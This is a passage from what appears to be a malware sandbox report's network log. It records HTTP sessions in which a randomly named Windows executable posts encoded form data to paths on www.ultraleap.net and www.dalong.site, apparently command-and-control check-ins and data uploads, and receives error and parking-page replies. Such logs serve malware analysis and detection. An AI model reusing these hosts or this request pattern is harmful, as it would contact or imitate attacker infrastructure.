                                              Sep 25, 2024 12:46:46.637725115 CEST608INHTTP/1.1 501 Unsupported method ('POST')
                                              Server: nginx
                                              Date: Wed, 25 Sep 2024 10:46:46 GMT
                                              Content-Type: text/html
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                              Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              2192.168.2.449738217.70.184.50803368C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 25, 2024 12:46:48.591730118 CEST789OUTPOST /8pln/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.ultraleap.net
                                              Origin: http://www.ultraleap.net
                                              Content-Length: 224
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.ultraleap.net/8pln/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Data Raw: 50 52 5f 78 58 72 41 3d 65 2f 58 6a 75 76 46 59 68 35 34 77 69 5a 68 41 7a 78 6a 4e 52 4c 73 6a 51 71 4d 33 79 50 51 76 47 57 56 74 63 30 72 57 33 48 2f 31 49 55 6b 54 45 73 63 79 35 44 4e 50 41 67 73 49 54 49 4d 68 50 70 71 51 58 67 61 33 72 34 76 6b 4b 75 67 70 76 4f 36 45 36 62 6a 47 34 4a 42 4c 48 34 78 51 76 36 4f 4b 59 53 75 4e 5a 32 58 51 61 61 38 72 4d 6d 73 35 4f 45 76 6e 65 73 47 36 50 33 6e 65 68 55 33 48 4c 6e 69 73 57 54 42 79 36 78 55 50 34 55 42 2b 5a 50 44 4c 6c 30 6e 43 7a 67 2f 36 76 4b 4c 39 65 52 51 52 5a 66 4c 42 51 53 46 47 76 4d 42 69 4e 62 50 61 49 43 58 38 55 77 4e 64 65 41 4a 68 4b 56 4d 38 52 65 66 58 64 50 76 42 4c 45 79 78 74 45 67 3d
                                              Data Ascii: PR_xXrA=e/XjuvFYh54wiZhAzxjNRLsjQqM3yPQvGWVtc0rW3H/1IUkTEscy5DNPAgsITIMhPpqQXga3r4vkKugpvO6E6bjG4JBLH4xQv6OKYSuNZ2XQaa8rMms5OEvnesG6P3nehU3HLnisWTBy6xUP4UB+ZPDLl0nCzg/6vKL9eRQRZfLBQSFGvMBiNbPaICX8UwNdeAJhKVM8RefXdPvBLEyxtEg=
                                              Sep 25, 2024 12:46:49.215470076 CEST608INHTTP/1.1 501 Unsupported method ('POST')
                                              Server: nginx
                                              Date: Wed, 25 Sep 2024 10:46:49 GMT
                                              Content-Type: text/html
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                              Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              3192.168.2.449739217.70.184.50803368C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 25, 2024 12:46:51.139370918 CEST10871OUTPOST /8pln/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.ultraleap.net
                                              Origin: http://www.ultraleap.net
                                              Content-Length: 10304
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.ultraleap.net/8pln/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Data Raw: 50 52 5f 78 58 72 41 3d 65 2f 58 6a 75 76 46 59 68 35 34 77 69 5a 68 41 7a 78 6a 4e 52 4c 73 6a 51 71 4d 33 79 50 51 76 47 57 56 74 63 30 72 57 33 48 33 31 49 68 77 54 46 4c 41 79 34 44 4e 50 44 67 73 4c 54 49 4d 6f 50 70 79 55 58 67 57 42 72 2b 72 6b 49 4d 59 70 70 2f 36 45 78 62 6a 47 30 70 42 4f 61 49 78 42 76 2b 71 56 59 53 2b 4e 5a 32 58 51 61 59 6b 72 62 69 34 35 43 6b 76 6b 49 63 47 2b 46 6e 6e 36 68 55 76 58 4c 6e 75 38 57 69 68 79 37 51 6b 50 30 47 5a 2b 61 76 44 4a 6d 30 6e 61 7a 67 69 36 76 4f 72 4c 65 53 4e 38 5a 59 37 42 51 56 38 51 35 4f 45 2b 58 71 66 70 56 54 50 76 55 79 46 6e 58 33 52 32 44 45 45 44 4f 65 58 50 47 49 48 46 4d 6d 32 79 75 78 73 33 79 49 30 62 67 78 54 31 76 59 77 46 50 6c 63 4e 6b 43 55 61 77 63 32 33 53 32 73 38 46 79 41 50 50 64 48 67 6a 31 39 62 54 38 61 6b 38 73 72 51 31 6a 54 59 71 49 70 5a 37 5a 4f 42 66 30 55 49 38 66 74 56 56 43 48 68 41 46 70 65 70 39 6b 51 48 32 31 4b 4b 4e 42 48 77 61 59 6d 4c 2b 38 54 38 78 47 41 4d 72 71 65 74 36 68 4e 78 78 55 5a 65 31 [TRUNCATED]
                                              Data Ascii: PR_xXrA=e/XjuvFYh54wiZhAzxjNRLsjQqM3yPQvGWVtc0rW3H31IhwTFLAy4DNPDgsLTIMoPpyUXgWBr+rkIMYpp/6ExbjG0pBOaIxBv+qVYS+NZ2XQaYkrbi45CkvkIcG+Fnn6hUvXLnu8Wihy7QkP0GZ+avDJm0nazgi6vOrLeSN8ZY7BQV8Q5OE+XqfpVTPvUyFnX3R2DEEDOeXPGIHFMm2yuxs3yI0bgxT1vYwFPlcNkCUawc23S2s8FyAPPdHgj19bT8ak8srQ1jTYqIpZ7ZOBf0UI8ftVVCHhAFpep9kQH21KKNBHwaYmL+8T8xGAMrqet6hNxxUZe19mRm7pSynUpV8FmM0qrq/tZxxkR6uir0qeuGuWWrkF8yD+lcVdj5vQC3bpeFwI5HDpVRR7zBNBLdVzZ4Ba6WsIWxHMP+c/KtTmQ+1vGox7cMDTUa8WzgUK57s2TVGbbN2nuu2Q62W5F/9znSs7Czhf1SwN69+NyyDhKZieZmSYQ9lZZpm/WPzOC9eNXduu8NXLa+oQoWy+xzK2UsuwDbxakg+QTgjaNQFqh/0ceHxS8eZ6gyu7ZzxfEejWLg71vrFR2gQ34MfOLZMKFs4a71jjsi8P3ofzAH5TyTVrfyCQP8kzQtt7wKPeGvekxMenUoGXbc4r6jL0bRxHBsPVhZuG8+5szYI8YvOWH/s6W+HrHRhYDK6+sTxQlDyGNkYQOjUfqc8vIBvcMMCmy49cJkL4/YOieVc8OpjmM6KBAV/AB4cRo0NKIdMV0I7AtuuvRsr9j33xjuxi/FviyzAL7jSafDjzxNY1ZD0QHPdDquzRc0L/eIIXEclqCcyA5TaExNIXBoCyBaozPUNzZxVSs8Ja8vfjywDfHT4h4Cocjwit8jSreS1J3Yk5Wlp4CLS4fkZnzI7ppxoMK4UkLZayz5v29BifUuptnxNIIS39b8c1v0lu3a2Gc1mOf91mVKCDF6XlKiNDBq9k/kIBzje1T2f+xq9gq/d4CwKr [TRUNCATED]
                                              Sep 25, 2024 12:46:51.747678995 CEST713INHTTP/1.1 502 Bad Gateway
                                              Server: nginx
                                              Date: Wed, 25 Sep 2024 10:46:51 GMT
                                              Content-Type: text/html
                                              Content-Length: 568
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 [TRUNCATED]
                                              Data Ascii: <html><head><title>502 Bad Gateway</title></head><body bgcolor="white"><center><h1>502 Bad Gateway</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              4192.168.2.449740217.70.184.50803368C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 25, 2024 12:46:54.357356071 CEST509OUTGET /8pln/?PR_xXrA=T9/DtY4QstE2hf5O1waUB+I/eJ4Uv9cvfz5cQjr/yHb6PkgoDrQz8TZtAEENUqwsBaW/Syqgj8DnNvIHzYG9oL792aB/FoBSyK+aeSTPR1nXcfMqNX8wInY=&n0=mTk8u4lhzbnhVh HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.ultraleap.net
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Sep 25, 2024 12:46:54.950181007 CEST1236INHTTP/1.1 200 OK
                                              Server: nginx
                                              Date: Wed, 25 Sep 2024 10:46:54 GMT
                                              Content-Type: text/html
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Vary: Accept-Language
                                              Data Raw: 37 38 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 69 73 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 20 68 61 73 20 62 65 65 6e 20 72 65 67 69 73 74 65 72 65 64 20 77 69 74 68 20 47 61 6e 64 69 2e 6e 65 74 2e 20 49 74 20 69 73 20 63 75 72 72 65 6e 74 6c 79 20 70 61 72 6b 65 64 20 62 79 20 74 68 65 20 6f 77 6e 65 72 2e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 75 6c 74 72 61 6c 65 61 70 2e 6e 65 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 [TRUNCATED]
                                              Data Ascii: 785<!DOCTYPE html><html class="no-js" lang=en> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width"> <meta name="description" content="This domain name has been registered with Gandi.net. It is currently parked by the owner."> <title>ultraleap.net</title> <link rel="stylesheet" type="text/css" href="main-78844350.css"> <link rel="shortcut icon" href="favicon.ico" type="image/x-icon"/> <link rel="preload" as="font" href="fonts/Montserrat-Regular.woff2" type="font/woff2" crossorigin/> <link rel="preload" as="font" href="fonts/Montserrat-SemiBold.woff2" type="font/woff2" crossorigin/> </head> <body> <div class="ParkingPage_2023-root_2dpus "><main class="OldStatic_2023-root_1AGy1 Parking_2023-root_qhMQ2"><div><article class="Parking_2023-content_1rA87"><h1 class="OldStatic_2023-title_13ceK">This domain name has been registered with Gandi.net</h1><div class="OldStatic_2023-text_37nqO Parking_2023-text_1JZys"><p><a href="https://wh [TRUNCATED]
                                              Sep 25, 2024 12:46:54.950196981 CEST890INData Raw: 72 61 6c 65 61 70 2e 6e 65 74 22 3e 3c 73 74 72 6f 6e 67 3e 56 69 65 77 20 74 68 65 20 57 48 4f 49 53 20 72 65 73 75 6c 74 73 20 6f 66 20 75 6c 74 72 61 6c 65 61 70 2e 6e 65 74 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 61 3e 20 74 6f 20 67 65 74 20 74 68
                                              Data Ascii: raleap.net"><strong>View the WHOIS results of ultraleap.net</strong></a> to get the domains public registration information.</p></div><div class="Parking_2023-positionbox_2OgLh"><div class="Parking_2023-outerbox_2j18t"><p class="Parking_202


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              5192.168.2.449742172.96.187.60803368C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 25, 2024 12:47:00.253182888 CEST763OUTPOST /v2c3/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.dalong.site
                                              Origin: http://www.dalong.site
                                              Content-Length: 204
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.dalong.site/v2c3/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Data Raw: 50 52 5f 78 58 72 41 3d 31 49 2b 62 6f 39 54 68 6c 45 38 47 71 4f 75 47 63 6e 53 55 2b 42 62 64 32 68 31 4f 58 4f 4d 55 65 49 43 33 52 69 38 6c 38 75 53 52 34 41 45 39 45 44 5a 54 63 77 4e 42 53 50 70 61 6c 7a 54 59 70 6c 41 7a 4c 4d 38 2f 32 7a 4e 75 67 45 66 78 58 68 41 55 34 4e 79 4e 49 70 35 58 77 6a 4e 6e 6c 59 7a 59 37 2f 58 6b 50 42 76 79 2f 69 63 4d 6b 54 6c 71 64 57 77 76 4c 6a 6f 41 71 56 34 59 51 4c 44 48 57 6b 4e 4c 2b 6b 52 52 51 4d 4b 35 77 73 34 6b 61 4b 6b 48 75 54 41 49 39 79 6c 6e 54 51 5a 2f 6a 52 66 6a 52 6d 53 72 55 39 41 56 73 6b 43 36 45 63 30 39 73 55 6c 69 7a 46 36 45 32 41 3d 3d
                                              Data Ascii: PR_xXrA=1I+bo9ThlE8GqOuGcnSU+Bbd2h1OXOMUeIC3Ri8l8uSR4AE9EDZTcwNBSPpalzTYplAzLM8/2zNugEfxXhAU4NyNIp5XwjNnlYzY7/XkPBvy/icMkTlqdWwvLjoAqV4YQLDHWkNL+kRRQMK5ws4kaKkHuTAI9ylnTQZ/jRfjRmSrU9AVskC6Ec09sUlizF6E2A==
                                              Sep 25, 2024 12:47:00.696494102 CEST1033INHTTP/1.1 404 Not Found
                                              Connection: close
                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                              pragma: no-cache
                                              content-type: text/html
                                              content-length: 796
                                              date: Wed, 25 Sep 2024 10:47:00 GMT
                                              server: LiteSpeed
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              6192.168.2.449743172.96.187.60803368C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 25, 2024 12:47:02.794791937 CEST783OUTPOST /v2c3/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.dalong.site
                                              Origin: http://www.dalong.site
                                              Content-Length: 224
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.dalong.site/v2c3/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Data Raw: 50 52 5f 78 58 72 41 3d 31 49 2b 62 6f 39 54 68 6c 45 38 47 73 75 65 47 50 30 36 55 32 42 62 61 76 52 31 4f 65 75 4e 54 65 49 4f 33 52 6d 74 34 39 59 4b 52 34 68 30 39 4b 68 78 54 53 51 4e 42 61 76 70 56 34 44 53 57 70 6c 64 4d 4c 4f 6f 2f 32 31 68 75 67 42 62 78 58 57 30 56 36 64 79 44 51 5a 35 47 2b 44 4e 6e 6c 59 7a 59 37 37 2b 42 50 42 33 79 2b 54 73 4d 6c 32 52 74 51 32 77 73 49 6a 6f 41 38 56 34 69 51 4c 43 69 57 68 73 51 2b 6d 5a 52 51 4f 53 35 33 39 34 6e 55 4b 6b 42 67 7a 42 41 78 42 46 72 55 56 38 32 6d 42 4c 6a 54 55 43 57 56 37 52 50 39 56 6a 74 57 63 51 4f 78 54 73 57 2b 47 48 4e 74 4b 71 57 52 72 52 57 58 4b 49 4a 4b 71 62 75 41 55 52 62 56 6c 59 3d
                                              Data Ascii: PR_xXrA=1I+bo9ThlE8GsueGP06U2BbavR1OeuNTeIO3Rmt49YKR4h09KhxTSQNBavpV4DSWpldMLOo/21hugBbxXW0V6dyDQZ5G+DNnlYzY77+BPB3y+TsMl2RtQ2wsIjoA8V4iQLCiWhsQ+mZRQOS5394nUKkBgzBAxBFrUV82mBLjTUCWV7RP9VjtWcQOxTsW+GHNtKqWRrRWXKIJKqbuAURbVlY=
                                              Sep 25, 2024 12:47:03.239924908 CEST1033INHTTP/1.1 404 Not Found
                                              Connection: close
                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                              pragma: no-cache
                                              content-type: text/html
                                              content-length: 796
                                              date: Wed, 25 Sep 2024 10:47:03 GMT
                                              server: LiteSpeed
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              7192.168.2.449744172.96.187.60803368C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 25, 2024 12:47:05.344904900 CEST10865OUTPOST /v2c3/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.dalong.site
                                              Origin: http://www.dalong.site
                                              Content-Length: 10304
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.dalong.site/v2c3/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
